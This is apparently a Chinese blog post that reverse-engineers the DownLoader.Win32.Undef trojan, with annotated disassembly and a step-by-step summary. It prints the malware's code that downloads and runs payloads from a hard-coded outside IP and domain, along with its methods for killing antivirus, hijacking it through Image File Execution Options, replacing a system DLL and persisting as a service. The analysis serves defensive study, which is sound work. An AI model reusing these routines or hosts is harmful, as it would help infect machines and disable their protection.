003C47A9 >push eax ; |pBytesReturned
003C47AA >push 8C0 ; |OutBufferSize = 8C0 (2240.)
003C47AF >lea eax, dword ptr [ebp-1DA0] ; |
003C47B5 >push eax ; |OutBuffer
003C47B6 >push 0 ; |InBufferSize = 0
003C47B8 >push 0 ; |InBuffer = NULL
003C47BA >push 22221F ; |IoControlCode = 22221F
003C47BF >push dword ptr [ebp-10] ; |hDevice
003C47C2 >call dword ptr [<&KERNEL32.DeviceIoC>; /DeviceIoControl
003C47C8 >mov dword ptr [ebp-8], 003C6350
003C47CF >mov eax, dword ptr [ebp-8]
003C47D2 >movsx eax, byte ptr [eax]
003C47D5 >test eax, eax
003C47D7 >je 003C489A
003C47DD >push 400 ; /n = 400 (1024.)
003C47E2 >push 0 ; |c = 00
003C47E4 >lea eax, dword ptr [ebp-F40] ; |
003C47EA >push eax ; |s
003C47EB >call <jmp.&MSVCRT.memset> ; /memset
003C47F0 >add esp, 0C
003C47F3 >push dword ptr [ebp-8] ; /<%s>
003C47F6 >push dword ptr [3C6008] ; |<%s> = "SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options"
003C47FC >push dword ptr [3C6000] ; |<%s> = "/Registry/Machine"
003C4802 >push 003C569C ; |Format = "%s/%s/%s"
003C4807 >lea eax, dword ptr [ebp-F40] ; |
003C480D >push eax ; |s
003C480E >call dword ptr [<&USER32.wsprintfA>] ; /wsprintfA
003C4814 >add esp, 14
003C4817 >lea eax, dword ptr [ebp-F40]
003C481D >push eax ; /String
003C481E >call dword ptr [<&KERNEL32.lstrlenA>>; /lstrlenA
003C4824 >mov dword ptr [ebp-18], eax
003C4827 >push 800 ; /n = 800 (2048.)
003C482C >push 0 ; |c = 00
003C482E >lea eax, dword ptr [ebp-820] ; |
003C4834 >push eax ; |s
003C4835 >call <jmp.&MSVCRT.memset> ; /memset
003C483A >add esp, 0C
003C483D >push dword ptr [ebp-18] ; /WideBufSize
003C4840 >lea eax, dword ptr [ebp-820] ; |
003C4846 >push eax ; |WideCharBuf
003C4847 >push dword ptr [ebp-18] ; |StringSize
003C484A >lea eax, dword ptr [ebp-F40] ; |
003C4850 >push eax ; |StringToMap
003C4851 >push 0 ; |Options = 0
003C4853 >push 0 ; |CodePage = CP_ACP
003C4855 >call dword ptr [<&KERNEL32.MultiByte>; /MultiByteToWideChar
003C485B >push 0 ; /pOverlapped = NULL
003C485D >lea eax, dword ptr [ebp-14] ; |
003C4860 >push eax ; |pBytesReturned
003C4861 >push 0 ; |OutBufferSize = 0
003C4863 >push 0 ; |OutBuffer = NULL
003C4865 >mov eax, dword ptr [ebp-18] ; |
003C4868 >lea eax, dword ptr [eax+eax+2] ; |
003C486C >push eax ; |InBufferSize
003C486D >lea eax, dword ptr [ebp-820] ; |
003C4873 >push eax ; |InBuffer
003C4874 >push 22245C ; |IoControlCode = 22245C
003C4879 >push dword ptr [ebp-10] ; |hDevice
003C487C >call dword ptr [<&KERNEL32.DeviceIoC>; /DeviceIoControl
003C4882 >push dword ptr [ebp-8] ; /String
003C4885 >call dword ptr [<&KERNEL32.lstrlenA>>; /lstrlenA
003C488B >mov ecx, dword ptr [ebp-8]
003C488E >lea eax, dword ptr [ecx+eax+1]
003C4892 >mov dword ptr [ebp-8], eax
003C4895 >jmp 003C47CF
003C489A >push dword ptr [ebp-10]
003C489D >call 003C42BA
003C48A2 >push 0 ; /pThreadId = NULL
003C48A4 >push 0 ; |CreationFlags = 0
003C48A6 >push 0 ; |pThreadParm = NULL
003C48A8 >push 003C27B7 ; |ThreadFunction = appmgmts.003C27B7
003C48AD >push 0 ; |StackSize = 0
003C48AF >push 0 ; |pSecurity = NULL
003C48B1 >call dword ptr [<&KERNEL32.CreateThr>; /CreateThread 创建线程2
003C48B7 >cmp dword ptr [ebp-10], -1
003C48BB >je short 003C48D7
003C48BD >xor eax, eax
003C48BF >inc eax
003C48C0 >je short 003C48D7
003C48C2 >push dword ptr [ebp-10]
003C48C5 >call 003C42BA 不断循环检测服务是否启动，如果服务被关闭，则启动。并对绝大多数杀毒软件作镜像劫持
003C48CA >push 5DC
003C48CF >call dword ptr [ebp-92C] sleep函数
003C48D5 >jmp short 003C48BD
003C48D7 >xor eax, eax
003C48D9 >leave
003C48DA >retn 4

复制代码

总体流程结束
------------------------------------------------------------------
进入线程 2，代码如下：

003C27B7 >push ebp
003C27B8 >mov ebp, esp
003C27BA >sub esp, 90
003C27C0 >and dword ptr [ebp-20], 0
003C27C4 >and dword ptr [ebp-1C], 0
003C27C8 >and dword ptr [ebp-14], 0
003C27CC >and dword ptr [ebp-C], 0
003C27D0 >and dword ptr [ebp-18], 0
003C27D4 >and dword ptr [ebp-8], 0
003C27D8 >and dword ptr [ebp-64], 0
003C27DC >and dword ptr [ebp-10], 0
003C27E0 >and dword ptr [ebp-4], 0
003C27E4 >push 003C5474 ; /FileName = "urlmon.dll" 加载urlmon.dll模块
003C27E9 >call dword ptr [<&KERNEL32.LoadLibra>; /LoadLibraryA
003C27EF >mov dword ptr [ebp-64], eax
003C27F2 >push 003C5480 ; /ProcNameOrOrdinal = "URLDownloadToFileA" 获取该函数地址
003C27F7 >push dword ptr [ebp-64] ; |hModule
003C27FA >call dword ptr [<&KERNEL32.GetProcAd>; /GetProcAddress
003C2800 >mov dword ptr [3C7584], eax
003C2805 >push 003C5494 ; /FileName = "Wininet.dll"
003C280A >call dword ptr [<&KERNEL32.LoadLibra>; /LoadLibraryA
003C2810 >mov dword ptr [ebp-10], eax
003C2813 >push 003C54A0 ; /ProcNameOrOrdinal = "GetUrlCacheEntryInfoA"
003C2818 >push dword ptr [ebp-10] ; |hModule
003C281B >call dword ptr [<&KERNEL32.GetProcAd>; /GetProcAddress
003C2821 >mov dword ptr [ebp-4], eax
003C2824 >push 0
003C2826 >push dword ptr [3C600C]
003C282C >push 200
003C2831 >push 003C6058 ; ASCII "up.nba1001.com"
003C2836 >call <enstr> 字符处理函数
003C283B >push 0
003C283D >push dword ptr [3C600C]
003C2843 >push 30
003C2845 >push 003C625C ; ASCII "down"
003C284A >call <enstr>
003C284F >push 0
003C2851 >push dword ptr [3C600C]
003C2857 >push 5C
003C2859 >push 003C6290 ; UNICODE "02"
003C285E >call <enstr>
003C2863 >call 003C2742
003C2868 >push 003C54B8 ; ASCII "Explorer.exe"
003C286D >call <KillPro> 关闭Explorer.exe进程
003C2872 >mov dword ptr [ebp-C], eax
003C2875 >cmp dword ptr [ebp-C], 0
003C2879 >je short 003C28AD
003C287B >and dword ptr [ebp-68], 0
003C287F >push dword ptr [ebp-C] ; /ProcessId
003C2882 >push 0 ; |Inheritable = FALSE
003C2884 >push 400 ; |Access = QUERY_INFORMATION
003C2889 >call dword ptr [<&KERNEL32.OpenProce>; /OpenProcess
003C288F >mov dword ptr [ebp-68], eax
003C2892 >lea eax, dword ptr [ebp-8]
003C2895 >push eax ; /phToken
003C2896 >push 0F01FF ; |DesiredAccess = STANDARD_RIGHTS_REQUIRED|TOKEN_ASSIGN_PRIMARY|TOKEN_DUPLICATE|TOKEN_IMPERSONATE|TOKEN_QUERY|TOKEN_QUERY_SOURCE|TOKEN_ADJUST_PRIVILEGES|TOKEN_ADJUST_GROUPS|TOKEN_ADJUST_DEFAULT|100
003C289B >push dword ptr [ebp-68] ; |hProcess
003C289E >call dword ptr [<&ADVAPI32.OpenProce>; /OpenProcessToken
003C28A4 >push dword ptr [ebp-68] ; /hObject
003C28A7 >call dword ptr [<&KERNEL32.CloseHand>; /CloseHandle
003C28AD >mov dword ptr [ebp-20], 003C6290
003C28B4 >xor eax, eax
003C28B6 >inc eax
003C28B7 >je 003C2B2C
003C28BD >mov dword ptr [ebp-6C], 1
003C28C4 >push 40 ; /n = 40 (64.)
003C28C6 >push 0 ; |c = 00
003C28C8 >lea eax, dword ptr [ebp-60] ; |
003C28CB >push eax ; |s
003C28CC >call <jmp.&MSVCRT.memset> ; /memset
003C28D1 >add esp, 0C
003C28D4 >push 0
003C28D6 >push 40
003C28D8 >lea eax, dword ptr [ebp-60]
003C28DB >push eax
003C28DC >lea eax, dword ptr [ebp-14]
003C28DF >push eax
003C28E0 >lea eax, dword ptr [ebp-1C]
003C28E3 >push eax
003C28E4 >push 003C6058
003C28E9 >call 003C22F0 关键call 3，查看网络连接
003C28EE >test eax, eax
003C28F0 >jnz short 003C28F7
003C28F2 >jmp 003C2B2C
003C28F7 >mov eax, dword ptr [ebp-20]
003C28FA >movsx eax, byte ptr [eax]
003C28FD >test eax, eax
003C28FF >je 003C2B1F
003C2905 >and dword ptr [ebp-70], 0
003C2909 >push 400 ; /n = 400 (1024.)
003C290E >push 0 ; |c = 00
003C2910 >push 003C6E60 ; |s = appmgmts.003C6E60
003C2915 >call <jmp.&MSVCRT.memset> ; /memset
003C291A >add esp, 0C
003C291D >push 104 ; /n = 104 (260.)
003C2922 >push 0 ; |c = 00
003C2924 >push 003C7260 ; |s = appmgmts.003C7260
003C2929 >call <jmp.&MSVCRT.memset> ; /memset
003C292E >add esp, 0C
003C2931 >push dword ptr [ebp-20] ; /<%s>
003C2934 >push 003C625C ; |<%s> = "?掫h?
003C2939 >push dword ptr [3C6050] ; |<%d> = 1F90 (8080.)
003C293F >lea eax, dword ptr [ebp-60] ; |
003C2942 >push eax ; |<%s>
003C2943 >push 003C54C8 ; |Format = "http://%s:%d/%s/%s.exe"
003C2948 >push 003C6E60 ; |s = appmgmts.003C6E60
003C294D >call dword ptr [<&USER32.wsprintfA>] ; /wsprintfA 字符连接，得到下载链接
003C2953 >add esp, 18
003C2956 >call 003C176E 获得一个随机数字串
003C295B >push eax ; /<%d>
003C295C >push dword ptr [ebp-20] ; |<%s>
003C295F >push 003C7368 ; |<%s> = "C:/DOCUME~1/safe/LOCALS~1/Temp/"
003C2964 >push 003C54E0 ; |Format = "%s%s%d.exe"
003C2969 >push 003C7260 ; |s = appmgmts.003C7260
003C296E >call dword ptr [<&USER32.wsprintfA>] ; /wsprintfA 字符连接，得到下载到本地临时目录的文件名，本机是C:/LOCALS~1/Temp/01139.exe
003C2974 >add esp, 14
003C2977 >and dword ptr [ebp-74], 0
003C297B >jmp short 003C2984
003C297D >mov eax, dword ptr [ebp-74]
003C2980 >inc eax
003C2981 >mov dword ptr [ebp-74], eax
003C2984 >cmp dword ptr [ebp-74], 2
003C2988 >jge 003C2AE1
003C298E >and dword ptr [ebp-7C], 0
003C2992 >and dword ptr [ebp-80], 0
003C2996 >and dword ptr [ebp-78], 0
003C299A >push 0 ; /pThreadId = NULL
003C299C >push 0 ; |CreationFlags = 0
003C299E >push 0 ; |pThreadParm = NULL
003C29A0 >push 003C278F ; |ThreadFunction = appmgmts.003C278F
003C29A5 >push 0 ; |StackSize = 0
003C29A7 >push 0 ; |pSecurity = NULL
003C29A9 >call dword ptr [<&KERNEL32.CreateThr>; /CreateThread 创建线程3，下载病毒文件到临时目录。
003C29AF >mov dword ptr [ebp-80], eax
003C29B2 >push 1F40 ; /Timeout = 8000. ms
003C29B7 >push dword ptr [ebp-80] ; |hObject
003C29BA >call dword ptr [<&KERNEL32.WaitForSi>; /WaitForSingleObject
003C29C0 >mov dword ptr [ebp-78], eax
003C29C3 >cmp dword ptr [ebp-78], 102
003C29CA >jnz short 003C29D7
003C29CC >push 1 ; /ExitCode = 1
003C29CE >push dword ptr [ebp-80] ; |hThread
003C29D1 >call dword ptr [<&KERNEL32.Terminate>; /TerminateThread
003C29D7 >lea eax, dword ptr [ebp-7C]
003C29DA >push eax ; /pExitCode
003C29DB >push dword ptr [ebp-80] ; |hThread
003C29DE >call dword ptr [<&KERNEL32.GetExitCo>; /GetExitCodeThread
003C29E4 >push dword ptr [ebp-80] ; /hObject
003C29E7 >call dword ptr [<&KERNEL32.CloseHand>; /CloseHandle
003C29ED >cmp dword ptr [ebp-7C], 0
003C29F1 >jnz 003C2AB8
003C29F7 >and dword ptr [ebp-84], 0
003C29FE >lea eax, dword ptr [ebp-84]
003C2A04 >push eax
003C2A05 >push 0
003C2A07 >push 003C6E60
003C2A0C >call dword ptr [ebp-4]
003C2A0F >cmp dword ptr [ebp-84], 0
003C2A16 >je short 003C2A7B
003C2A18 >push dword ptr [ebp-84]
003C2A1E >call <jmp.&MSVCRT.operator new>
003C2A23 >pop ecx
003C2A24 >mov dword ptr [ebp-8C], eax
003C2A2A >mov eax, dword ptr [ebp-8C]
003C2A30 >mov dword ptr [ebp-88], eax
003C2A36 >lea eax, dword ptr [ebp-84]
003C2A3C >push eax
003C2A3D >push dword ptr [ebp-88]
003C2A43 >push 003C6E60
003C2A48 >call dword ptr [ebp-4]
003C2A4B >mov eax, dword ptr [ebp-88]
003C2A51 >push dword ptr [eax+8] ; /FileName
003C2A54 >call dword ptr [<&KERNEL32.DeleteFil>; /DeleteFileA
003C2A5A >cmp dword ptr [ebp-88], 0
003C2A61 >je short 003C2A7B
003C2A63 >mov eax, dword ptr [ebp-88]
003C2A69 >mov dword ptr [ebp-90], eax
003C2A6F >push dword ptr [ebp-90]
003C2A75 >call <jmp.&MSVCRT.operator delete>
003C2A7A >pop ecx
003C2A7B >push 003C7260
003C2A80 >call 003C26DA 创建C:/LOCALS~1/Temp/01139.exe文件
003C2A85 >cmp eax, 1
003C2A88 >jnz short 003C2AA6
003C2A8A >and dword ptr [ebp-18], 0
003C2A8E >mov dword ptr [ebp-70], 1
003C2A95 >push dword ptr [ebp-8]
003C2A98 >push 003C7260
003C2A9D >call 003C25F4 执行下载回来的文件01139.exe
003C2AA2 >jmp short 003C2AE1
003C2AA4 >jmp short 003C2AB8
003C2AA6 >mov eax, dword ptr [ebp-18]
003C2AA9 >inc eax
003C2AAA >mov dword ptr [ebp-18], eax
003C2AAD >push 003C7260 ; /FileName = ""
003C2AB2 >call dword ptr [<&KERNEL32.DeleteFil>; /DeleteFileA 删除C:/LOCALS~1/Temp/01139.exe文件
003C2AB8 >cmp dword ptr [ebp-7C], 800C0006
003C2ABF >jnz short 003C2AD1
003C2AC1 >mov dword ptr [ebp-70], 1
003C2AC8 >mov eax, dword ptr [ebp-18]
003C2ACB >inc eax
003C2ACC >mov dword ptr [ebp-18], eax
003C2ACF >jmp short 003C2AE1
003C2AD1 >push 0BB8 ; /Timeout = 3000. ms
003C2AD6 >call dword ptr [<&KERNEL32.Sleep>] ; /Sleep
003C2ADC >jmp 003C297D
003C2AE1 >cmp dword ptr [ebp-18], 3
003C2AE5 >jb short 003C2AF0
003C2AE7 >mov dword ptr [ebp-6C], 1
003C2AEE >jmp short 003C2B1F
003C2AF0 >cmp dword ptr [ebp-70], 0
003C2AF4 >jnz short 003C2AFC
003C2AF6 >and dword ptr [ebp-6C], 0
003C2AFA >jmp short 003C2B1F
003C2AFC >push dword ptr [ebp-20] ; /String
003C2AFF >call dword ptr [<&KERNEL32.lstrlenA>>; /lstrlenA
003C2B05 >mov ecx, dword ptr [ebp-20]
003C2B08 >lea eax, dword ptr [ecx+eax+1]
003C2B0C >mov dword ptr [ebp-20], eax
003C2B0F >push 1F40 ; /Timeout = 8000. ms
003C2B14 >call dword ptr [<&KERNEL32.Sleep>] ; /Sleep
003C2B1A >jmp 003C28F7
003C2B1F >cmp dword ptr [ebp-6C], 1
003C2B23 >jnz short 003C2B27
003C2B25 >jmp short 003C2B2C
003C2B27 >jmp 003C28B4
003C2B2C >push dword ptr [ebp-64] ; /hLibModule
003C2B2F >call dword ptr [<&KERNEL32.FreeLibra>; /FreeLibrary
003C2B35 >xor eax, eax
003C2B37 >leave
003C2B38 >retn 4

复制代码

-----------------
进入线程3，代码如下：

003C278F />push ebp
003C2790 |>mov ebp, esp
003C2792 |>push ecx
003C2793 |>and [local.1], 0
003C2797 |>push 0
003C2799 |>push 0
003C279B |>push 003C7260 ; ASCII "C:/DOCUME~1/safe/LOCALS~1/Temp/01139.exe"
003C27A0 |>push 003C6E60 ; ASCII "http://67.159.35.85:8080/down/0.exe"
003C27A5 |>push 0
003C27A7 |>call dword ptr [3C7584] ; urlmon.URLDownloadToFileA
003C27AD |>mov [local.1], eax
003C27B0 |>mov eax, [local.1]
003C27B3 |>leave
003C27B4 />retn 4

复制代码

总结下流程：
1，比较模块基址和3C0000h,用于判断自身是exe还是dll文件。
2，是exe，创建C:/IOSYS.ini配置文件,加载sfc.dll,获得去除文件保护属性的导出函数地址，感染C:/WINDOWS/system32/appmgmts.dll，
qmgr.dll，检查文件appmgmts.dll是否存在，若不存在，则创建C:/System32/appmgmts.dll。若找到appmgmts.dll，则去掉该文件保护属性，
释放病毒动态链接库并命名为appmgmts.dll，替换系统正常文件%SystemRoot%/System32/appmgmts.dll。并替换文件
C:/system32/dllcache/appmgmts.dll.
3，启动"AppMgmt"服务，通过该服务加载C:/System32/appmgmts.dll。
4，读取C:/IOSYS.ini配置文件病毒路径，删除病毒主体。
5，创建线程，创建一个名为Accopt的服务，并加载。检测进程avp.exe等安全软件是否存在，如果找到，将其终止,并恢复SSDT。
6，创建线程,访问目标网址，下载大量病毒到本地运行。
7，不断循环检测服务是否启动，如果服务被关闭，则启动。并对绝大多数杀毒软件作镜像劫持。
可爱的结束符

下载者DownLoader.Win32.Undef分析相关推荐

遭遇Windows Update.exe/Trojan.Win32.Autoit.fc，情se发布器.exe/AdWare.Win32.Undef.eko
遭遇Windows Update.exe/Trojan.Win32.Autoit.fc,情se发布器.exe/AdWare.Win32.Undef.eko endurer 原创 2009-05-19 ...
遭遇 kupqytu.dll/Trojan.Win32.Undef.fzq,kmwprnp.dll/Trojan.Win32.Agent.lmo 等1
遭遇 kupqytu.dll/Trojan.Win32.Undef.fzq,kmwprnp.dll/Trojan.Win32.Agent.lmo 等1 endurer 原创 2008-06-03 第1 ...
淘宝店铺装修教程之下载淘宝视频及分析视频地址中的高逼格信息
摘要: 关于淘宝视频方面的教程,艺灵已写过好几篇了,唯独没有下载的教程,然后群内小伙伴也一直问这个问题,所以特写此教程,内含信息量巨大,看官慎入...... 一.起因还是因为刚有群友在群里问这个问题 ...
BT和eMule下载协议的比较和分析
转载:http://www.yuanma.org/data/2008/0420/article_3009.htmBT和eMule下载协议的比较和分析由于从事P2P下载引擎开发得原因,对BT和 ...
Localspace Viewer下载影像并进行地形分析
Localspace Viewer下载影像并进行地形分析 1 准备遥感影像在Localspace Viewer中,下载遥感影像,在Arcgis中加载如下: 2 获取等高线信息在Localspace ...
【Android 逆向】GDA 逆向工具安装 ( GDA 下载 | GDA 简介 | 运行 GDA 分析 APK 文件 )
文章目录一.GDA 相关资料二.运行 GDA 分析 APK 文件一.GDA 相关资料 GDA 相关资料 : GDA 工具官网 : http://www.gda.wiki:9090 GDA 文档 ...
nexbox本地网络调试工具下载_「下载」 Windows 10 WinDBG 分析转储日志和蓝屏日志排查错误原因...
使用Windows 10相对来说出现蓝屏概率还是很高的,但微软提供的错误代码有时候可能无法帮助我们解决问题. 所以我们需要使用更专业的工具来分析系统记录的日志,有日志进行排查后就可以定位到具体什么原因 ...
HTTP下载文件校验失败原因分析与解决
从7月中旬左右,我们客户端更新失败率由原来的2%上升到10%.更新后台数据统计显示更新失败中的90%为HTTP下载失败,具体的失败原因是文件下载完成后MD5与服务器预期的MD5不匹配. 在着手调查解决 ...
[搜片神器]BT种子下载超时很多的问题分析
继续接着第一篇写:使用C#实现DHT磁力搜索的BT种子后端管理程序+数据库设计(开源)[搜片神器] 谢谢园子朋友的支持,已经找到个VPS进行测试,国外的服务器: h31bt.org 大家可以给提点意 ...

下载者DownLoader.Win32.Undef分析

下载者DownLoader.Win32.Undef分析相关推荐

最新文章

热门文章